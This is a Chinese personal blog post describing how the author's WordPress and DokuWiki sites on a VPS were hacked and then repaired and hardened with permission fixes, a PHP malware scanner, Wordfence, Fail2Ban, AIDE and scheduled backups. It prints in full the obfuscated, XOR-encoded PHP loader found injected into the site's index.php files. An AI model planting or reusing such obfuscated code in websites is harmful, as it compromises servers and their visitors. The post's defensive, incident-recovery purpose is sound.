其实这次已经不是第一次服务器被黑了,之前也有过一次。最后也查到了被感染的病毒,也查到了病毒来源网站,把那个网站整个IP段都给Ban掉了, 总算清静了一些。

而这次被黑的是VPS上运行的Wordpress和Dokuwiki. 一直以来都运行良好,并未出现什么大问题。

怎么发现被黑了

最初是发现Wiki网站主页无法显示正常,只能显示网页头,里面内容都无法正常渲染。然后找到对应的index.php, 打开内容,发现被插入了大量奇怪的代码,然后在整个目录”grep -R”也发现了大量的文件都有相同的内容,其中就同时包括Wordpress和Dokuwiki目录,看到之后就惊呆了,本以为网站被黑还是小概念的事情,没想到现在已经成为标准和肉鸡了。

被插入的代码大概长这样

<?php $gGwNpGdv='13Y,3=iS683 P<6'; $syxykHO='RA<MGX65CVPT9SX'^$gGwNpGdv; $LsSulTaf='ZRAxS>Y,2SR=:0F; >9Zj; =cOX2A>o846jMHxJlc6892ZGD:rHWY2O1 UqkU==ReU+3Vbew.3 srULlaFo4ai< ByKgmOz3Ff+ KZRXUMmsNuvSY>.4G=<aH1 DRcyvkZqbxCAjI787gAjbPF ,5->jIjt5th<<=:e1yFV4N4;V-fF I1asxigeJY33E0:mH= YXcnh1yMhpS49X;eqMTP<BSakRQZJWiP =YQzR 9B0ALpP+=,3P-lenq6y7>sif5:Or9YRxXghW1R.XVBk9c5L+M0Lq KLaLvW=WBo0;p0726koev7Y6=Nc2PII:6jLdwZQ:6zfK3gT=A<X6 gjhanvo=-x;r0>Gl:,>jtyIM2YV;.xqNZbYV+97Q.YU dPLnK7HBPbqw7VD.NQeb9SV;IiMdPk3d1J6R5.ydg:DB>6LU8A;N=y36;g0Q04ms73=K;;6WWCn2SC>YXBm2 L9HJwM. 12jR 0qHzdZ3PhQ,E7xiCT Y7ZJk W5bPTI0F>xmP2YroNo07=VyuScmnFQxnA+THRkD R3j9sePjfdAQiTX1yVRz6nxspk6FF d4BTTARtJtsUeqpsui844RUfU2J+-KG2=DqN=R TR1+nCgHWU WaaVNxLTr7mj-77ArJHM Ogf .6;;3PchaWedY; 9xrgtnM'; $GNvfmG=$syxykHO('', '34iY5K7OF:=SeU>RSJJrMCOO<+9F a0UABMdaX1fjPMWQ..+TR08+m+PT4.48HIzA1JG7NESEVYZRulLA=e=hMSU6YvGJhA9OoMO9rv1upMCuUR:eMZF+XRIlUA03JBVO3ZIQIHcmXMCGoWBxbDMALeN 7TkTLWYDaAXYcvG:FW3CNbK,HH.QRmlC+VG0BTElRU-qXdaLs0bzwPX,ZELm21P16Zav5;>66;EDylZ4AU1UzFz6DOIR3ELMJ.u6xu:,FTIoVR<+XeYHsG3B-3kKBi<hO,D-.K.5AqVsV2;T:2TTVFWKRERA8ZH+X8-CCSPJdES>0NWSF09n2R3Y9UHGBL><3>hh+oRQMgHQIGJIGiiD8:NKQQ5PkPrOXC0q20YDmlJ R1yZkxSS70OnlEFO2:N,RGm-aNn;nR3AOYYGz1,MS><Y-R4XQKYI8T0DU2,ZFIcYZE2aw1V6 Q==jIVA8XafWiJAES59EIXaAn3UxL5M1VXOetA+E;34K2L=5, C2MPJ;W UCnKTVI7PUuEMF+5MFeO5<30cK7JMdZEmWFCu7YdoRI00MPZHFCSWr ETQu7a jE,FK3BXPUSIYFF3,9>W3tH3.AI7YiM3Y8=POIoGl34T6HHvnXltRLgcHAV-Zn,,T.<APOOWTR4D5Hlom<CIMPBNOd0'^$LsSulTaf); $GNvfmG();

既然被黑了,自然就想到了,Digital Ocean应该会发相关的Warning邮件吧,一查GMail,果然,好几封相关邮件,而且Google也发了相关的警告,并把网站拉入了黑名单。邮件最早是在2/28号就已经发出了,只是没有注意到。网站带病毒裸奔了这么多天。

再次感受到了互联网的不安全,暴露在外网的服务器随时都有被黑的风险。

如何手工修复

WordPress手工修复参考了这篇文章

  • https://www.wpzhiku.com/what-to-do-when-wordpress-was-hacked/

基本上大概相当于重装了。

Dokuwiki修复参考的是官方的upgrade教程

  • https://www.dokuwiki.org/install:upgrade

对相关目录权限也进行了修复

find . -type d -exec chmod 755 {} \;
find . -iname "*.php" -exec chmod 644 {} \;
chown www-data:www-data . -R

对网站进行简单加困

  • 使用php scanner进行php的全站扫描,虽然有些文件误报,但还是好用的
    • https://github.com/scr34m/php-malware-scanner.git
  • WordPress/Dokuwiki密码进行了更新,删除不需要的user
  • WordPress安装了Wordfence, 虽然是免费版本,但已经基本够用了
    • 可以自动/定时扫描目录文件,如果有文件改动会提示
    • 如果有文件已经被感染,可以提示一键修复,并且有View/Diff功能,很赞
    • 自动Block非法的登录IP
  • 重新检查修复了Fail2Ban服务
  • 安装了aide: sudo apt-get install aide

后继

功与防会一直延续,常在河边走,哪能不湿鞋。而且目前感觉并未完全清除所有的感染文件,今天又发现了几个Wordpress php文件被修改了,还好安装了Wordfence, 直接一键修复。生化危机的即视感,明显就是明完待继的节奏。

备份的重要性,再一次体现出来,在Digital Ocean上购买了一个Volume, 直接当硬盘mount上。写了备份bash script, crontab定期备份,script很简单,就是Wordpress/Dokuwiki进行了打包压缩:(github: https://github.com/pjq/hack_tools.git)

被黑网站如何起死回生
Tagged on:                 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.